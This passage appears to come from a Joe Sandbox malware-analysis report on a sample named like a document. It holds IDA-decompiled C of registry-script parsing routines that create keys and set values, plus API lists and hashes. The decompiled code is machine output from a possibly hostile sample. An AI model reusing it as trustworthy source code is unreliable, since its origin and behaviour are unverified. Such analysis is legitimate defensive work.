    															goto L29;
    														} else {
    															__eflags =  *(_t104 - 0x32) - 1;
    															if(__eflags != 0) {
    																goto L29;
    															} else {
    																_push(L"\r\n\t}\r\n}\r\n");
    																_t68 = E00151928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
    																__eflags = _t68;
    																if(_t68 == 0) {
    																	goto L5;
    																} else {
    																	 *(_t104 - 0x32) = _t80;
    																	goto L29;
    																}
    															}
    														}
    													}
    												} else {
    													 *(_t104 - 0x38) =  &(( *(_t104 - 0x38))[1]);
    													goto L29;
    												}
    											}
    										} else {
    											 *(_t104 - 0x31) = 1;
    											goto L29;
    										}
    									}
    								} else {
    									_t74 = E0015772C(_t103, "HKCR");
    									__eflags = _t74;
    									if(_t74 == 0) {
    										L13:
    										_t84 =  *(_t104 - 0x31);
    										goto L14;
    									} else {
    										__eflags = _t74 -  *_t101;
    										if(__eflags != 0) {
    											goto L13;
    										} else {
    											_t75 = CharNextA( *_t101);
    											 *_t101 = _t75;
    											_t76 = CharNextA(_t75);
    											 *_t101 = _t76;
    											_t77 = CharNextA(_t76);
    											 *_t101 = _t77;
    											_t78 = CharNextA(_t77);
    											_push(L"HKCU\r\n{\tSoftware\r\n\t{\r\n\t\tClasses");
    											 *_t101 = _t78;
    											_t79 = E00151928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
    											__eflags = _t79;
    											if(_t79 == 0) {
    												goto L5;
    											} else {
    												 *(_t104 - 0x32) = 1;
    												goto L13;
    											}
    										}
    									}
    								}
    								goto L46;
    								L29:
    								_t103 =  *_t101;
    								_push(_t103);
    								__eflags =  *_t103 - 0x25;
    								if( *_t103 != 0x25) {
    									L32:
    									_t53 = E001518A6(_t104 - 0x44, _t103, CharNextA() - _t103);
    									__eflags = _t53;
    									if(_t53 == 0) {
    										goto L5;
    									} else {
    										goto L33;
    									}
    								} else {
    									_t103 = CharNextA();
    									 *_t101 = _t103;
    									__eflags =  *_t103 - 0x25;
    									if( *_t103 != 0x25) {
    										_t103 = E001522D6(_t103, 0x25);
    										__eflags = _t103;
    										if(_t103 == 0) {
    											L44:
    											_t80 = 0x80020009;
    										} else {
    											_t89 = _t103 -  *_t101;
    											__eflags = _t89 - 0x1f;
    											if(_t89 > 0x1f) {
    												_t80 = 0x80004005;
    											} else {
    												E00151285(E0015770F(_t104 - 0x30, 0x20,  *_t101, _t89));
    												_t105 = _t105 + 0x14;
    												_t61 = E00152199(_t101[1], _t104 - 0x30);
    												__eflags = _t61;
    												if(__eflags == 0) {
    													goto L44;
    												} else {
    													_push(_t61);
    													_t62 = E00151928(_t80, _t104 - 0x44, _t101, _t103, __eflags);
    													__eflags = _t62;
    													if(_t62 == 0) {
    														goto L5;
    													} else {
    														_t63 =  *_t101;
    														while(1) {
    															__eflags = _t63 - _t103;
    															if(_t63 == _t103) {
    																break;
    															}
    															_t63 = CharNextA(_t63);
    															 *_t101 = _t63;
    														}
    														L33:
    														_t103 = CharNextA( *_t101);
    														 *_t101 = _t103;
    														__eflags =  *_t103;
    														if( *_t103 == 0) {
    															goto L45;
    														} else {
    															_t48 =  *(_t104 - 0x38);
    															_t84 =  *(_t104 - 0x31);
    															_t98 =  *((intOrPtr*)(_t104 - 0x33));
    															continue;
    														}
    													}
    												}
    											}
    										}
    									} else {
    										_push(_t103);
    										goto L32;
    									}
    								}
    								goto L46;
    							}
    						}
    					} else {
    						L5:
    						_t80 = 0x8007000e;
    					}
    					L46:
    					__imp__CoTaskMemFree( *(_t104 - 0x3c));
    				}
    				return E001601C5(_t80, _t101, _t103);
    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 001529EF
    • _strlen.LIBCMT ref: 00152A14
    • CoTaskMemAlloc.OLE32(00000000,00000040,00152C84,?,00000000,00000000,?), ref: 00152A2E
    • CharNextA.USER32(?,?,?,00000000), ref: 00152A95
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152A9E
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152AA7
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152AB0
    • CharNextA.USER32(?,?,?,00000000), ref: 00152AE6
    • CharNextA.USER32(?,?,?,00000000), ref: 00152AF8
    • CharNextA.USER32(00000000,?,?,?,00000000), ref: 00152B03
    • CharNextA.USER32(00000000,}},?,?,00000000), ref: 00152B6A
    • CharNextA.USER32(?), ref: 00152B7A
    • CharNextA.USER32(?,?,00000000), ref: 00152B96
    • __cftof.LIBCMT ref: 00152BD8
    • CharNextA.USER32(00000000,00000000,?,?,?,00151D41,?,?), ref: 00152C0C
    • CoTaskMemFree.OLE32(?), ref: 00152C39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CharNext$Task$AllocFreeH_prolog3___cftof_strlen
    • String ID: }}$HKCR$HKCU{Software{Classes
    • API String ID: 4131663743-1142484189
    • Opcode ID: 9dacc30c20ab41e87d725952905b4212c36fa4cd7d99d26430c01016cf8d82fd
    • Instruction ID: da890aed9fd435bf33920d43b9429e6370b7d98c1e55636880007a468e5e950d
    • Opcode Fuzzy Hash: 9dacc30c20ab41e87d725952905b4212c36fa4cd7d99d26430c01016cf8d82fd
    • Instruction Fuzzy Hash: D171A472904246EFDF259F74DC946ADBBB4AF26302F240019FC61EB252EB749C89CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00152DA0(intOrPtr __ecx, void* __edx, char* _a4, void* _a8, void* _a12, void* _a16) {
    				char _v8;
    				char _v16;
    				signed int _v20;
    				char _v280;
    				char _v4376;
    				intOrPtr _v4380;
    				int _v4384;
    				void* _v4388;
    				signed int _v4392;
    				int _v4396;
    				signed int _v4400;
    				int _v4404;
    				void* _v4408;
    				signed int _v4412;
    				void* _v4416;
    				void* _v4420;
    				signed int _v4424;
    				signed int _v4428;
    				signed int _v4432;
    				signed int _v4436;
    				signed int _v4440;
    				void* _v4444;
    				char _v4448;
    				signed int _v4452;
    				signed int _v4456;
    				signed int _v4460;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t131;
    				signed int _t132;
    				void* _t140;
    				void* _t143;
    				void* _t144;
    				void* _t145;
    				void* _t146;
    				void* _t152;
    				void* _t157;
    				void* _t159;
    				void* _t162;
    				void* _t165;
    				void* _t167;
    				void* _t169;
    				void* _t171;
    				void* _t172;
    				void* _t179;
    				void* _t180;
    				void* _t190;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				signed int _t225;
    				char* _t242;
    				void* _t243;
    				void* _t245;
    				void* _t246;
    				void* _t247;
    				void* _t248;
    				void* _t250;
    				signed int _t251;
    				void* _t252;
    
    				_t240 = __edx;
    				_push(0xffffffff);
    				_push(0x160906);
    				_push( *[fs:0x0]);
    				E001602C0(0x115c);
    				_t131 =  *0x169008; // 0x26a91022
    				_t132 = _t131 ^ _t251;
    				_v20 = _t132;
    				_push(_t132);
    				 *[fs:0x0] =  &_v16;
    				_v4380 = __ecx;
    				_t242 = _a4;
    				_v4388 = _a8;
    				_t197 = 0;
    				_v4400 = 0;
    				_v4404 = 0;
    				_v4396 = 0;
    				_v8 = 0;
    				_t245 = E00152327(__ecx, _t242);
    				if(_t245 < 0) {
    					L89:
    					 *[fs:0x0] = _v16;
    					_pop(_t243);
    					_pop(_t246);
    					_pop(_t198);
    					return E0015403C(_t245, _t198, _v20 ^ _t251, _t240, _t243, _t246);
    				} else {
    					while( *_t242 != 0x7d) {
    						_v4384 = 1;
    						lstrcmpiA(_t242, "Delete");
    						asm("sbb esi, esi");
    						_t247 = _t245 + 1;
    						_v4392 = _t247;
    						_t140 = lstrcmpiA(_t242, "ForceRemove");
    						__eflags = _t140;
    						if(_t140 == 0) {
    							L4:
    							_t245 = E00152327(_v4380, _t242);
    							__eflags = _t245;
    							if(_t245 < 0) {
    								L87:
    								if(_t197 != 0) {
    									RegCloseKey(_t197);
    								}
    								goto L89;
    							}
    							_t248 = 0;
    							__eflags = _a12;
    							if(_a12 == 0) {
    								L15:
    								_t143 = lstrcmpiA(_t242, "NoRemove");
    								__eflags = _t143;
    								if(_t143 != 0) {
    									L17:
    									_t144 = lstrcmpiA(_t242, "Val");
    									__eflags = _t144;
    									if(_t144 != 0) {
    										_t240 = 0x5c;
    										_t145 = E001522D6(_t242, 0x5c);
    										__eflags = _t145;
    										if(_t145 != 0) {
    											L86:
    											_t245 = 0x80020009;
    											goto L87;
    										}
    										__eflags = _a12 - _t145;
    										if(_a12 == _t145) {
    											__eflags = _a16;
    											if(_a16 != 0) {
    												_t146 = 2;
    											} else {
    												_t146 = E00151629( &_v4404, _v4388, _t242, 0x20019);
    												_t197 = _v4404;
    											}
    											_v4392 = _t146;
    											__eflags = _t146;
    											_t212 =  ==  ? _a16 : 1;
    											_v4420 =  ==  ? _a16 : 1;
    											E00151285(E0015770F( &_v280, 0x104, _t242, 0xffffffff));
    											_t252 = _t252 + 0x14;
    											_t245 = E00152327(_v4380, _t242);
    											__eflags = _t245;
    											if(_t245 < 0) {
    												goto L87;
    											} else {
    												_t214 = _v4380;
    												_t245 = E0015297D(_t197, _v4380, _t240, _t242);
    												__eflags = _t245;
    												if(_t245 < 0) {
    													goto L87;
    												}
    												__eflags =  *_t242 - 0x7b;
    												if( *_t242 != 0x7b) {
    													L67:
    													_t152 = _v4392;
    													__eflags = _t152 - 2;
    													if(_t152 == 2) {
    														continue;
    													}
    													__eflags = _t152;
    													if(_t152 == 0) {
    														__eflags = _a16;
    														if(_a16 == 0) {
    															L76:
    															_t225 = E00152948(_t214, _t197);
    															_t152 = 0;
    															_v4392 = _t225;
    															__eflags = _t197;
    															if(_t197 != 0) {
    																_t152 = RegCloseKey(_t197);
    																_t225 = _v4392;
    																_t197 = 0;
    																__eflags = 0;
    																_v4404 = 0;
    															}
    															_v4400 = _v4400 & 0x00000000;
    															__eflags = _t152;
    															if(_t152 != 0) {
    																L48:
    																_t245 = E001512D7(_t152);
    																goto L87;
    															} else {
    																__eflags = _v4384 - _t152;
    																if(_v4384 == _t152) {
    																	continue;
    																}
    																__eflags = _t225;
    																if(_t225 != 0) {
    																	continue;
    																}
    																_v4456 = _v4456 & _t225;
    																_v4452 = _v4452 & _t225;
    																_v4460 = _v4388;
    																_t152 = E00151596( &_v4460,  &_v280);
    																_v4460 = _v4460 & 0x00000000;
    																__eflags = _t152;
    																if(_t152 != 0) {
    																	goto L48;
    																}
    																continue;
    															}
    														}
    														_t157 = E00152948(_t214, _t197);
    														__eflags = _t157;
    														if(_t157 == 0) {
    															goto L76;
    														}
    														_t159 = E00152919( &_v280);
    														__eflags = _t159;
    														if(_t159 != 0) {
    															__eflags = _v4384;
    															if(__eflags != 0) {
    																E00151685( &_v4404, _t240, _t242, __eflags,  &_v280);
    																_t197 = _v4404;
    															}
    														}
    														continue;
    													}
    													__eflags = _a16;
    													if(_a16 == 0) {
    														goto L48;
    													}
    													continue;
    												}
    												_t162 = E001574D0(_t242);
    												_pop(_t214);
    												__eflags = _t162 - 1;
    												if(_t162 != 1) {
    													goto L67;
    												}
    												_t245 = E00152DA0(_v4380, _t240, _t242, _t197, 0, _v4420);
    												__eflags = _t245;
    												if(_t245 >= 0) {
    													L66:
    													_t214 = _v4380;
    													_t245 = E00152327(_v4380, _t242);
    													__eflags = _t245;
    													if(_t245 < 0) {
    														goto L87;
    													}
    													goto L67;
    												}
    												__eflags = _v4420;
    												if(_v4420 == 0) {
    													goto L87;
    												}
    												goto L66;
    											}
    										}
    										_t199 = _v4388;
    										_t165 = E00151629( &_v4404, _t199, _t242, 0x2001f);
    										__eflags = _t165;
    										if(_t165 == 0) {
    											L49:
    											_t197 = _v4404;
    											L50:
    											_t245 = E00152327(_v4380, _t242);
    											__eflags = _t245;
    											if(_t245 < 0) {
    												goto L87;
    											}
    											__eflags =  *_t242 - 0x3d;
    											if( *_t242 != 0x3d) {
    												L53:
    												__eflags =  *_t242 - 0x7b;
    												if( *_t242 != 0x7b) {
    													continue;
    												}
    												_t167 = E001574D0(_t242);
    												__eflags = _t167 - 1;
    												if(_t167 != 1) {
    													continue;
    												}
    												_t245 = E00152DA0(_v4380, _t240, _t242, _t197, _a12, 0);
    												__eflags = _t245;
    												if(_t245 < 0) {
    													goto L87;
    												}
    												_t169 = E00152327(_v4380, _t242);
    												L33:
    												_t245 = _t169;
    												__eflags = _t245;
    												if(_t245 < 0) {
    													goto L87;
    												}
    												continue;
    											}
    											_t171 = E00152440(_v4380,  &_v4404, 0, _t242);
    											_t197 = _v4404;
    											_t245 = _t171;
    											__eflags = _t245;
    											if(_t245 < 0) {
    												goto L87;
    											}
    											goto L53;
    										}
    										_t172 = E00151629( &_v4404, _t199, _t242, 0x20019);
    										__eflags = _t172;
    										if(_t172 == 0) {
    											goto L49;
    										}
    										_t235 = _v4396;
    										_push( &_v4448);
    										_v4384 = 0;
    										_push( &_v4384);
    										__eflags = _v4396;
    										if(_v4396 == 0) {
    											_t152 = RegCreateKeyExA(_t199, _t242, 0, 0, 0, 0x2001f, 0, ??, ??);
    										} else {
    											_t252 = _t252 - 0x14;
    											_push(_t242);
    											_push(_t199);
    											_t152 = E00151348(_t235);
    										}
    										__eflags = _t152;
    										if(_t152 != 0) {
    											_t197 = _v4404;
    										} else {
    											_t152 = 0;
    											__eflags = _v4404;
    											if(_v4404 != 0) {
    												_t152 = RegCloseKey(_v4404);
    											}
    											_t197 = _v4384;
    											_v4404 = _t197;
    											_v4400 = 0;
    										}
    										__eflags = _t152;
    										if(_t152 == 0) {
    											goto L50;
    										} else {
    											goto L48;
    										}
    									}
    									_t245 = E00152327(_v4380,  &_v4376);
    									__eflags = _t245;
    									if(_t245 < 0) {
    										goto L87;
    									}
    									_t245 = E00152327(_v4380, _t242);
    									__eflags = _t245;
    									if(_t245 < 0) {
    										goto L87;
    									}
    									__eflags =  *_t242 - 0x3d;
    									if( *_t242 != 0x3d) {
    										goto L86;
    									}
    									__eflags = _a12;
    									if(_a12 == 0) {
    										__eflags = _a16;
    										if(_a16 != 0) {
    											L32:
    											_t169 = E0015297D(_t197, _v4380, _t240, _t242);
    											goto L33;
    										}
    										__eflags = _v4384;
    										if(_v4384 == 0) {
    											goto L32;
    										}
    										_v4416 = 0;
    										_v4412 = 0;
    										_v4408 = 0;
    										_t179 = E00151629( &_v4416, _v4388, 0, 0x20006);
    										__eflags = _t179;
    										if(_t179 != 0) {
    											L84:
    											_t180 = E001512D7(_t179);
    											__eflags = _v4416;
    											_t245 = _t180;
    											if(_v4416 != 0) {
    												RegCloseKey(_v4416);
    											}
    											goto L87;
    										}
    										_t250 = _v4416;
    										_t179 = RegDeleteValueA(_t250,  &_v4376);
    										__eflags = _t179;
    										if(_t179 == 0) {
    											L29:
    											__eflags = _t250;
    											if(_t250 != 0) {
    												RegCloseKey(_t250);
    												_t59 =  &_v4416;
    												 *_t59 = _v4416 & 0x00000000;
    												__eflags =  *_t59;
    											}
    											_t61 =  &_v4412;
    											 *_t61 = _v4412 & 0x00000000;
    											__eflags =  *_t61;
    											goto L32;
    										}
    										__eflags = _t179 - 2;
    										if(_t179 != 2) {
    											goto L84;
    										}
    										goto L29;
    									}
    									_v8 = 1;
    									_v4440 = _v4440 & 0x00000000;
    									_v4436 = _v4436 & 0x00000000;
    									_v4444 = _v4388;
    									_t245 = E00152440(_v4380,  &_v4444,  &_v4376, _t242);
    									_v4444 = 0;
    									_v4440 = 0;
    									_v4436 = 0;
    									__eflags = _t245;
    									if(_t245 < 0) {
    										goto L87;
    									}
    									_v8 = 0;
    									_v4440 = 0;
    									goto L53;
    								}
    								_v4384 = _t248;
    								_t245 = E00152327(_v4380, _t242);
    								__eflags = _t245;
    								if(_t245 < 0) {
    									goto L87;
    								}
    								goto L17;
    							}
    							_t240 = 0x5c;
    							_v4432 = 0;
    							_v4424 = 0;
    							_t190 = E001522D6(_t242, 0x5c);
    							__eflags = _t190;
    							if(_t190 != 0) {
    								goto L86;
    							} else {
    								__eflags = E00152919(_t242);
    								if(__eflags != 0) {
    									_v4432 = _v4388;
    									_v4428 = 0;
    									E00151685( &_v4432, 0x5c, _t242, __eflags, _t242);
    									_v4432 = 0;
    									_v4424 = 0;
    								}
    								__eflags = _v4392 - _t248;
    								if(_v4392 == _t248) {
    									_v4428 = _t248;
    									goto L15;
    								}
    								_t245 = E00152327(_v4380, _t242);
    								__eflags = _t245;
    								if(_t245 < 0) {
    									goto L87;
    								}
    								_t245 = E0015297D(_t197, _v4380, _t240, _t242);
    								__eflags = _t245;
    								if(_t245 < 0) {
    									goto L87;
    								}
    								_v4428 = _v4428 & 0x00000000;
    								goto L53;
    							}
    						}
    						__eflags = _t247;
    						if(_t247 == 0) {
    							_t248 = 0;
    							__eflags = 0;
    							goto L15;
    						}
    						goto L4;
    					}
    					goto L87;
    				}
    			}

    APIs
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
      • Part of subcall function 00152327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5
    • lstrcmpiA.KERNEL32 ref: 00152E26
    • lstrcmpiA.KERNEL32(?,ForceRemove), ref: 00152E3D
    • _strlen.LIBCMT ref: 001531AE
    • RegCloseKey.ADVAPI32(00000000,?), ref: 001533DE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
    • Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd
    Similarity
    • API ID: CharNext$lstrcmpi$Close_strlen
    • String ID: Delete$ForceRemove$NoRemove$Val
    • API String ID: 3980308911-1781481701
    • Opcode ID: 9dc49bd4acd923b3792355d87fff971c57ede03e38f11d163c5b6703db501403
    • Instruction ID: f4737f948cc7fdff86fdd01eba871ae08a764d7df39249de47edfdba3fc33645
    • Opcode Fuzzy Hash: 9dc49bd4acd923b3792355d87fff971c57ede03e38f11d163c5b6703db501403
    • Instruction Fuzzy Hash: 66F16571D00229DBCB399B618C45BEEB6B4BF55792F000199EE35AB241DB748F89CF90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00152440(int __ecx, void** _a4, char* _a8, intOrPtr _a12) {
    				int _v8;
    				char _v16;
    				intOrPtr _v20;
    				signed int _v24;
    				char _v4120;
    				char _v4376;
    				int _v4380;
    				int _v4384;
    				int _v4388;
    				char _v4392;
    				char* _v4396;
    				void** _v4400;
    				int _v4404;
    				char _v4408;
    				intOrPtr _v4412;
    				void* _v4428;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t95;
    				signed int _t96;
    				char* _t106;
    				int _t109;
    				char* _t112;
    				char* _t113;
    				signed char _t115;
    				char* _t118;
    				signed char _t124;
    				char* _t129;
    				char* _t132;
    				char* _t133;
    				intOrPtr _t134;
    				char* _t142;
    				void* _t147;
    				void* _t152;
    				long _t154;
    				CHAR* _t155;
    				char* _t157;
    				char _t158;
    				int _t162;
    				void* _t163;
    				char* _t164;
    				int _t165;
    				char* _t166;
    				char* _t179;
    				void* _t185;
    				char _t201;
    				void** _t208;
    				void* _t209;
    				char* _t214;
    				char* _t215;
    				char* _t216;
    				CHAR* _t217;
    				int _t218;
    				char* _t220;
    				void* _t221;
    				int _t223;
    				char* _t225;
    				char* _t226;
    				signed int _t227;
    				intOrPtr _t228;
    				intOrPtr _t231;
    
    				_push(0xffffffff);
    				_push(0x16088d);
    				_push( *[fs:0x0]);
    				_push(__ecx);
    				E001602C0(0x1128);
    				_t95 =  *0x169008; // 0x26a91022
    				_t96 = _t95 ^ _t227;
    				_v24 = _t96;
    				_push(_t96);
    				 *[fs:0x0] =  &_v16;
    				_v20 = _t228;
    				_v4404 = __ecx;
    				_t162 = 0;
    				_t208 = _a4;
    				_t220 = _a8;
    				_v4412 = _a12;
    				_v4388 = __ecx;
    				_v4400 = _t208;
    				_v4396 = _t220;
    				_v4384 = 0;
    				if(E00152327(__ecx,  &_v4120) >= 0) {
    					_t203 =  &_v4384;
    					if(E001521F6( &_v4120, _t203) != 0) {
    						E001522FE(_v4404);
    						_t100 = E00152327(_v4404,  &_v4120);
    						__eflags = _t100;
    						if(_t100 >= 0) {
    							_t106 = (_v4384 & 0x0000ffff) - 8;
    							__eflags = _t106;
    							if(_t106 == 0) {
    								_t109 = E001574D0( &_v4120) + 1;
    								__eflags = _t109;
    								_t164 = RegSetValueExA( *_t208, _t220, 0, 1,  &_v4120, _t109);
    								goto L62;
    							} else {
    								_t113 = _t106 - 9;
    								__eflags = _t113;
    								if(_t113 == 0) {
    									_t115 = E001574D0( &_v4120);
    									_v4384 = _t115;
    									__eflags = _t115 & 0x00000001;
    									if((_t115 & 0x00000001) != 0) {
    										L54:
    										_t100 = 0x80004005;
    									} else {
    										asm("cdq");
    										_v4380 = 0;
    										_t223 = _t115 - _t203 >> 1;
    										_v4392 = _t223;
    										_v8 = 4;
    										_v8 = 5;
    										__eflags = E00153D42(_t223) - 0x100;
    										if(__eflags <= 0) {
    											_t118 =  &_v4376;
    											_v4380 = _t118;
    										} else {
    											E00153D1D( &_v4380, _t223, __eflags, _t117);
    											_t118 = _v4380;
    										}
    										__eflags = _t118;
    										if(_t118 != 0) {
    											E00155210(_t208, _t118, _t162, _t223);
    											_v4388 = _t162;
    											__eflags = _v4384;
    											_t203 = _t162;
    											if(_v4384 > 0) {
    												_t165 = _v4384;
    												do {
    													_t124 = E00152256();
    													_t185 = 4;
    													 *((_t203 >> 1) + _v4380) =  *((_t203 >> 1) + _v4380) | _t124 << _t185 - ((_t203 & 0x00000001) << 0x00000002);
    													_t203 =  &(_v4388[1]);
    													_v4388 = _t203;
    													__eflags = _t203 - _t165;
    												} while (_t203 < _t165);
    												_t223 = _v4392;
    												_t162 = 0;
    												__eflags = 0;
    											}
    											_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 3, _v4380, _t223);
    											__eflags = _v4380 -  &_v4376;
    											if(_v4380 !=  &_v4376) {
    												E00153D14( &_v4380);
    											}
    											goto L62;
    										} else {
    											E00153D14( &_v4380);
    											goto L54;
    										}
    									}
    								} else {
    									_t129 = _t113;
    									__eflags = _t129;
    									if(_t129 == 0) {
    										_t225 = 0;
    										_v4388 = 0;
    										_v8 = 3;
    										_t132 = E001574D0( &_v4120) + 1;
    										_t203 = _t132;
    										_v4384 = _t132;
    										_t133 = E00151181( &_v4384, _t132);
    										_t231 = _t228 + 4;
    										__eflags = _t133;
    										if(_t133 < 0) {
    											L39:
    											_t100 = 0x8007000e;
    										} else {
    											_t212 = _v4384;
    											__eflags = _v4384 - 0x400;
    											if(__eflags > 0) {
    												L35:
    												_t134 = E00153CD7( &_v4388, _t225, _t212);
    												_t225 = _v4388;
    											} else {
    												_t142 = E001511AE(0, _t212, _t212, 0, __eflags);
    												__eflags = _t142;
    												if(_t142 == 0) {
    													goto L35;
    												} else {
    													E001602F0(_t212);
    													_v20 = _t231;
    													_t134 = _t231;
    												}
    											}
    											_t203 =  &_v4120;
    											_t100 = E0015121E(_t134,  &_v4120, _t212 >> 1, 3);
    											__eflags = _t100;
    											if(_t100 != 0) {
    												__imp__#277(_t100, _t162, _t162,  &_v4408);
    												_v4392 = _t100;
    												__eflags = _t100;
    												if(_t100 >= 0) {
    													_v4392 = _v4408;
    													_t164 = RegSetValueExA( *_v4400, _v4396, _t162, 4,  &_v4392, 4);
    													__eflags = _t225;
    													if(_t225 != 0) {
    														do {
    															_t214 =  *_t225;
    															_t225 = _t214;
    															E00157188(_t225);
    															__eflags = _t214;
    														} while (_t214 != 0);
    													}
    													goto L62;
    												} else {
    													__eflags = _t225;
    													if(_t225 != 0) {
    														do {
    															_t215 =  *_t225;
    															_t225 = _t215;
    															E00157188(_t225);
    															__eflags = _t215;
    														} while (_t215 != 0);
    														_t100 = _v4392;
    													}
    												}
    											} else {
    												__eflags = _t225;
    												if(_t225 != 0) {
    													do {
    														_t216 =  *_t225;
    														_t225 = _t216;
    														E00157188(_t225);
    														__eflags = _t216;
    													} while (_t216 != 0);
    												}
    												goto L39;
    											}
    										}
    									} else {
    										__eflags = _t129 != 0x3ff5;
    										if(_t129 != 0x3ff5) {
    											L64:
    											_t112 = E00152327(_v4404, _v4412);
    											__eflags = _t112;
    											_t179 =  <  ? _t112 : 0;
    											__eflags = _t179;
    											_t100 = _t179;
    										} else {
    											_t147 = E001574D0( &_v4120);
    											_v4380 = 0;
    											_v8 = 0;
    											_t23 = _t147 + 2; // 0x2
    											_v8 = 1;
    											__eflags = E00153D42(_t23) - 0x100;
    											if(__eflags <= 0) {
    												_t226 =  &_v4376;
    												_v4380 = _t226;
    											} else {
    												E00153D1D( &_v4380, _t220, __eflags, _t148);
    												_t226 = _v4380;
    											}
    											__eflags = _t226;
    											if(_t226 == 0) {
    												_push(0xe);
    												goto L28;
    											} else {
    												__eflags = _v4120;
    												_t217 =  &_v4120;
    												if(_v4120 != 0) {
    													do {
    														_t155 = CharNextA(_t217);
    														_t201 =  *_t217;
    														__eflags = _t201 - 0x5c;
    														if(_t201 != 0x5c) {
    															L17:
    															 *_t226 = _t201;
    															_t157 = IsDBCSLeadByte( *_t217 & 0x000000ff);
    															__eflags = _t157;
    															if(_t157 == 0) {
    																L20:
    																_t217 =  &(_t217[1]);
    																__eflags = _t217;
    																goto L21;
    															} else {
    																_t226 =  &(_t226[1]);
    																_t217 =  &(_t217[1]);
    																_t158 =  *_t217;
    																__eflags = _t158;
    																if(_t158 != 0) {
    																	 *_t226 = _t158;
    																	goto L20;
    																}
    															}
    														} else {
    															__eflags =  *_t155 - 0x30;
    															if( *_t155 != 0x30) {
    																goto L17;
    															} else {
    																 *_t226 = _t162;
    																_t217 = CharNextA(_t155);
    																goto L21;
    															}
    														}
    														goto L22;
    														L21:
    														_t226 =  &(_t226[1]);
    														__eflags =  *_t217;
    													} while ( *_t217 != 0);
    												}
    												L22:
    												 *_t226 = 0;
    												_t226 = _v4380;
    												__eflags = _t226;
    												if(_t226 != 0) {
    													_t218 = _t162;
    													_t166 = _t226;
    													do {
    														_t152 = E001574D0(_t166) + 1;
    														_t166 =  &(_t166[_t152]);
    														_t218 = _t218 + _t152;
    														__eflags = _t152 - 1;
    													} while (_t152 != 1);
    													_t154 = RegSetValueExA( *_v4400, _v4396, 0, 7, _t226, _t218);
    													_t226 = _v4380;
    													_t164 = _t154;
    												} else {
    													_push(0xd);
    													L28:
    													_pop(_t164);
    												}
    											}
    											__eflags = _t226 -  &_v4376;
    											if(_t226 !=  &_v4376) {
    												E00153D14( &_v4380);
    											}
    											L62:
    											__eflags = _t164;
    											if(_t164 == 0) {
    												goto L64;
    											} else {
    												_t100 = E001512D7(_t164);
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t100 = 0x80020009;
    					}
    				}
    				 *[fs:0x0] = _v16;
    				_pop(_t209);
    				_pop(_t221);
    				_pop(_t163);
    				return E0015403C(_t100, _t163, _v24 ^ _t227, _t203, _t209, _t221);
    			}



































































    APIs
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015235A
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 0015236A
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152379
      • Part of subcall function 00152327: CharNextA.USER32(00000000,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 00152383
      • Part of subcall function 00152327: CharNextA.USER32(?,?,00000000,00000000,?,?,?,00152CA6,?,00000000,?,00000000,00000000,?), ref: 001523D5
